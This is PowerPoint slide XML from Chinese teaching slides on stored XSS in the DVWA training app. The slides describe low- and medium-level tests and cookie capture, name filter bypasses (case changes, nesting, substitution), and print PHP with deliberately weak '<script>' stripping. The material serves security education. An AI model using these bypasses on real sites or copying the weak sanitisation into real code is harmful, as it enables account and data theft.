      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1049020"/>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1.低安全级别</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="1524000"/>
            <a:ext cx="10482580" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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使用POST提交了name与message，然后对dvwa库的guesbook表进行插入数据，从这里可以看出，确实是写死在了数据库中，更能理解XSS的存储型漏洞的详细了。在这个安全级别下无任何的防御措施，任人注入漏别。登录到后台的数据库中验证，与预期相符。结果如图10-27所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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1.低安全级别</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pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 27"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3312795" y="2971800"/>
            <a:ext cx="6443345" cy="3195955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-27 验证存储型漏洞的cookie值</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="1524000"/>
            <a:ext cx="10482580" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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直接使用最简单的弹窗类进行测试，可见其是将&lt;script&gt;标签给过滤了，解决办法与XSS的反射型的安全级别一致，大小写或替换，或内嵌都是可以的，具体结果如图10-28所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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4267200" y="6324600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-28 中安全级中的内嵌测试结果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 28"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="2503805"/>
            <a:ext cx="6002655" cy="3744595"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>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TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727547" y="1347605"/>
            <a:ext cx="6410325" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="174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个人信息泄露危机</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6" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727547" y="1994199"/>
            <a:ext cx="6410325" cy="954405"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>垃圾短信与推销电话频发，个人信息泄露成隐患，信息安全面临严峻挑战。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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7" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656837" y="3761555"/>
            <a:ext cx="6210300" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="174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网络信息安全的挑战</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8" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656837" y="4425262"/>
            <a:ext cx="6486525" cy="1370330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="dk1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>随着互联网发展，网络信息的安全成为了不可忽略的问题，也许你点击了一个网页链接，你的个人信息就被悄无声息的泄露了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">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pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="70000"/>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7432634" y="1237527"/>
            <a:ext cx="3505031" cy="4673376"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 10"/>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信息安全警钟</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="1524000"/>
            <a:ext cx="10482580" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>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测试发现，大小写，内嵌、替换都没有用，其实后台是将&lt;&gt;给转义了，这样无论使用&lt;script&gt;还是&lt;img&gt;标签都没有用。结果如图10-29和10-30所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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4267200" y="6248400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-29转义后&lt;script&gt;标签测试结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 29" descr="11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="2538730"/>
            <a:ext cx="6584315" cy="3567430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="1524000"/>
            <a:ext cx="10482580" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="15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测试发现，大小写，内嵌、替换都没有用，其实后台是将&lt;&gt;给转义了，这样无论使用&lt;script&gt;还是&lt;img&gt;标签都没有用。结果如图10-29和10-30所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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1600200" y="5943600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-29转义后&lt;script&gt;标签测试结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 29" descr="11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292860" y="2691130"/>
            <a:ext cx="4455795" cy="3192780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 30" descr="12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781800" y="2673350"/>
            <a:ext cx="4579620" cy="3178810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7315200" y="5943600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图10-30转义后&lt;img&gt;标签测试结果图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="1676400"/>
            <a:ext cx="10482580" cy="5015865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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&lt;?php</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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 if(isset($_POST['btnSign']))</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   $message = trim($_POST['mtxMessage']);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   $name    = trim($_POST['txtName']);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   $message = trim(strip_tags(addslashes($message)));</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   $message = mysql_real_escape_string($message);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   $message = htmlspecialchars($message);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   // Sanitize name input</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   $name = str_replace('&lt;script&gt;', '', $name);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   $name = mysql_real_escape_string($name);</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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     $query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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      $result = mysql_query($query) or die('&lt;pre&gt;' . mysql_error() . '&lt;/pre&gt;' );</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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   }</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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 ?&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="493395"/>
            <a:ext cx="5483860" cy="878205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16478" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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存储型XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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1600200" y="1143000"/>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2.中安全级别</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276350" y="1676400"/>
            <a:ext cx="10482580" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="10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查看页面的后台数据库，可见确实是对&lt;&gt;做了转换，其结果如图10-31所示。</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
